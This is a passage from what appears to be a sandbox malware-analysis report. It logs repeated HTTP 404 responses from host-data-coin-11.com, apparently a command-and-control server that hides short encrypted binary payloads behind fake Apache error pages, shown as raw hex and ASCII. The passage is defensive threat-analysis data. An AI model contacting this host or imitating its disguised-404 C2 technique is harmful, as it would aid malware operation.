request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df b7 82 16 95 2d ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%-0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e9 a1 88 70 bc 57 dd 43 d7 fd 24 84 27 ed c3 97 55 2a f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OR&:UPJ%9FpWC$'U*~0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df 94 85 29 87 13 c7 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%)0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df 94 85 29 87 13 c7 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%)0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b4 9f 42 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%B0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 74 5e a5 55 eb c4 66 e4 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevt^UfdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 06 0f bb 35 dc fe 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTev5fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
